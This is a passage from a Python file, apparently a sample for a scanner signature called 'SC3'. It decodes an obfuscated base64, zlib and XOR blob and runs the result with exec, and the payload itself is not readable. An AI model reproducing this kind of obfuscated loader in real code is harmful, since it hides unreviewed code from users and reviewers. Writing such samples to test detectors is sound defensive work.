ejTcZ0srOK9LH1ujrRb4OWPnku+o7V//gM//g1eaGrNqTX3mQ4WWnZLjv0ywLQkfd8omf/ph4O36RmbXXTEfZzowrn/4Ycg/07Vdcp6GZgWYACaG1/XfQpW3Z+aeYMGMjsyC5t2vK9NMmE1+/5eZQWefVn/4BMfD5t0eXNP8BRhPkI4="
_K = bytes.fromhex("b25d708ba1a8f6093b86f4a9")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
